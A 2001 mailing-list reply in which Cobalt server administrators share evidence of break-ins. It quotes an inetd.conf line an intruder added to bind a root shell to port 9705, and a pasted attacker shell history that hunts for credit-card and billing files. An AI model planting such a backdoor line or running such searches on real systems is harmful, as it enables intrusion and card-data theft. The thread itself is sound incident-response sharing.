[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] another cobalt hacked... looking for things to check.

Subject: RE: [cobalt-users] another cobalt hacked... looking for things to check.
From: "Tony" <isplists@xxxxxxxxxxxx>
Date: Thu Feb 15 04:07:22 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

+add me to the hacked box list.
+
+they added this line to my /etc/inetd.conf
+
+9705 stream tcp nowait root /bin/sh sh -i
+
+telnet localhost 9705 droped me straight into a r00tshell.
+
+i wonder what else they managed to do,
+hopefully it was just a 'skr1pt k1ddie' who has no idea why he hacked the
+box in the first place.

Mostly idiots. They're hitting Raq4's too:

s
ls *
locate bill
locate visa
locate credit
cd /home/chiliasp/odbc/internaldb/data/base/perros
ls
cd /usr/share/.vaio
cat cr*
exit

Follow-Ups:
- RE: [cobalt-users] another cobalt hacked... looking for things to check.
  - From: baltimoremd

References:
- [cobalt-users] another cobalt hacked... looking for things to check.
  - From: Sean Chester

Prev by Date: Re: [cobalt-users] Another Raq3 Hack
Next by Date: RE: [cobalt-users] Another Raq3 Hack
Previous by thread: [cobalt-users] another cobalt hacked... looking for things to check.
Next by thread: RE: [cobalt-users] another cobalt hacked... looking for things to check.

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index